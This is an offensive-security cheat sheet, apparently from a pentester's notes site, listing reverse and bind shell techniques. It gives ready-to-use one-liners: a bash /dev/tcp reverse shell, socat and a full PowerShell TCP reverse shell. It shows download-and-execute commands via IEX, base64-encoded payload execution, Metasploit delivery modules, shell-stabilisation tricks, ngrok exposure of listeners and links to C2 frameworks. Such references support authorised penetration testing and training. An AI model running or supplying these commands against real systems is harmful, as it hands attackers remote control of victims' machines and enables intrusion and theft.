# Reverse & Bind Shells

{% tabs %}
{% tab title="Generator" %}
{% embed url="<https://www.revshells.com/>" %}
Generator
{% endembed %}
{% endtab %}

{% tab title="Reverse Shell" %}
{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/>" %}
Reverse Shell
{% endembed %}
{% endtab %}

{% tab title="Bind Shell" %}
{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/>" %}
Bind Shell
{% endembed %}
{% endtab %}

{% tab title="Note" %}

```
busybox nc
```

{% endtab %}
{% endtabs %}

## Listener

{% code overflow="wrap" %}

```bash
nc -nlvp <PORT>
```

{% endcode %}

Public to the world

{% code overflow="wrap" %}

```bash
ngrok tcp <PORT>
```

{% endcode %}

## Main

{% tabs %}
{% tab title="Linux" %}
{% code overflow="wrap" %}

```bash
/bin/bash -c 'bash -i>&/dev/tcp/<myIP>/<myPORT> 0>&1';
```

{% endcode %}

{% code overflow="wrap" %}

```bash
echo "<PayloadBASE64>" | base64 -d | sh
```

{% endcode %}

```bash
socat TCP4:<myIP>:<myPORT> EXEC:/bin/bash
```

{% endtab %}

{% tab title="Windows" %}
{% code overflow="wrap" %}

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
powershell -enc <PayloadBASE64>
```

{% endcode %}

With [powercat](https://github.com/besimorhino/powercat) on attacker machine and adding at the end

{% code overflow="wrap" %}

```powershell
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>:<PORT>/powercat.ps1');powercat -c <IP_REV> -p <PORT_REV> -e powershell"
```

{% endcode %}

See also [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1).
{% endtab %}

{% tab title="Metasploit" %}
{% code overflow="wrap" %}

```
exploit/multi/script/web_delivery
```

{% endcode %}

{% code overflow="wrap" %}

```
exploit/windows/smb/smb_delivery
```

{% endcode %}
{% endtab %}
{% endtabs %}

## TTY

{% tabs %}
{% tab title="TTY" %}

<table><thead><tr><th width="173">Description</th><th width="516">Command</th></tr></thead><tbody><tr><td>Bash</td><td><code>/bin/bash -i</code></td></tr><tr><td>Python</td><td><code>python3 -c 'import pty; pty.spawn("/bin/bash")'</code></td></tr><tr><td>Perl</td><td><code>perl —e 'exec "/bin/sh";' perl: exec "/bin/sh";</code></td></tr><tr><td>Ruby</td><td><code>ruby: exec "/bin/sh"</code></td></tr><tr><td>Lua</td><td><code>lua: os.execute('/bin/sh')</code></td></tr><tr><td>AWK</td><td><code>awk 'BEGIN {system("/bin/sh")}'</code></td></tr><tr><td>Socat</td><td>On Attacker<br><code>socat file:`tty`,raw,echo=0 tcp-listen:&#x3C;PORT2></code> <br>On RevShell<br><code>socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:&#x3C;Attacker_IP>:&#x3C;PORT2></code></td></tr><tr><td><a href="https://github.com/brightio/penelope">penelope</a></td><td>Shell handler with auto-upgrade shells to PTY</td></tr><tr><td><a href="https://github.com/antonioCoco/ConPtyShell">ConPtyShell</a></td><td>Windows TTY<br><code>stty raw -echo; (stty size; cat) | nc -lvnp &#x3C;PORT></code> <br><code>IEX(IWR http://&#x3C;IP_SERVER>:&#x3C;PORT_SERVER>/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell &#x3C;MY_IP> &#x3C;MY_PORT></code></td></tr><tr><td><a href="https://github.com/hanslub42/rlwrap">rlwrap</a></td><td>A readline wrapper, allow the editing of keyboard input for any command.<br><code>rlwrap &#x3C;COMMAND> &#x3C;ARGS></code> <br><br><code>rlwrap -cAr nc -lnvp 80</code></td></tr><tr><td><a href="https://github.com/Fahrj/reverse-ssh">reverse-ssh</a></td><td>Statically-linked ssh server with reverse shell functionality.<br>Victim:<br><code>.\reverse-ssh.exe -p 9999</code><br>Attacker:<br><code>ssh -p 9999 &#x3C;USER>@&#x3C;TARGET></code></td></tr></tbody></table>
{% endtab %}

{% tab title="Note" %}
{% code overflow="wrap" %}

```bash
<CTRL+Z>
stty raw -echo 
fg 
```

{% endcode %}
{% endtab %}
{% endtabs %}

## Command & Control (C2)

<table data-header-hidden><thead><tr><th width="171.6666259765625"></th><th></th></tr></thead><tbody><tr><td><a href="c2-and-exploitation-framework/havoc">Havoc</a></td><td>Havoc is a modern and malleable post-exploitation command and control framework with GUI.<br><a href="https://havocframework.com/docs/welcome">Doc</a></td></tr><tr><td><a href="https://github.com/t3l3machus/Villain">Villain</a></td><td>A high level stage 0/1 C2 framework that can handle multiple reverse TCP &#x26; HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).<br><a href="https://github.com/t3l3machus/Villain/blob/main/Usage_Guide.md">Doc</a></td></tr></tbody></table>